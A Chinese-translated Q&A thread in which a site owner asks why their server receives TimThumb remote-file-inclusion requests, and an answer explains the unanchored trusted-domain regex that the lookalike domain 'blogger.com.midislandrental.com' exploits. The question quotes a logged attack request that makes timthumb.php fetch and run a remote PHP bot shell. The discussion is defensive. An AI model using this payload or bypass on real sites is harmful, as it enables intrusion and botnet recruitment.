通过另一台服务器远程文件包含?

时间:2011-12-14 00:46:11

标签: security wordpress ddos remote-file-inclusion

我的服务器(mediaquarter.at)目前正被这样的请求DDoSed(有一些小的变化):hXXp://www.mediaquarter.at/http://www.madeineurope.org.uk/media/functions /timthumb/timthumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php(URL“已停用”,因此没有人会不小心点击它)

请注意,如果您尝试下载引用的PHP文件:在preg_replace中,/ e开关已激活且代码包含多个eval语句 - 在您想要查看它之前清理它!看起来像pBot,您可以在此处找到有关它的更多信息:http://www.offensivecomputing.net/?q=node/1417

TimThumb易受远程文件包含的攻击(http://eromang.zataz.com/2011/09/20/wordpress-timthumb-rfi-vulnerability-used-as-botnet-recruitment-vector/) - 似乎是在WordPress中非常普遍。所以我会理解有人打电话给hXXp://www.madeineurope.org.uk/media/functions/timthumb/timthumb.php?src = http://blogger.com.midislandrental.com/.mods/sh.php来开发漏洞。

然而,试图通过另一个网站(mediaquarter.at)调用它有什么意义,这只会导致404错误消息?另外我的服务器没有运行WordPress,而是SilverStripe,所以这似乎毫无意义。

这只是攻击者的错误/愚蠢,还是我在这里忽略某种攻击媒介?

PS:服务器只是一些廉价的虚拟主机,我根本无法访问它,所以我无法验证系统是否有任何变化。

1 个答案:

答案 0 :(得分:2)

如果你没有timthumb.php文件,那么你就不会那么简单明了。这是一个非常奇特的漏洞,我深入研究过,因为(到目前为止)它是独一无二的。您应该阅读the exploits撰写的attacker's point of view

简而言之,它来自“受信任”网站(如youtube.com和blogger.com)的缓存图片。但是这个正则表达式编写得很糟糕,并没有绑定到字符串的末尾。改变你的子域名来愚弄这个正则表达式检查是微不足道的。这就是攻击者的域名为blogger.com.midislandrental.com的原因。

你得到DDoS的原因可能是因为timthumb.php的获取没有返回404或者通过timthumb.php传播的大量僵尸网络错误地指纹你是易受攻击的。你可能会出现在谷歌dork中寻找机器人试图找到易受攻击的主机。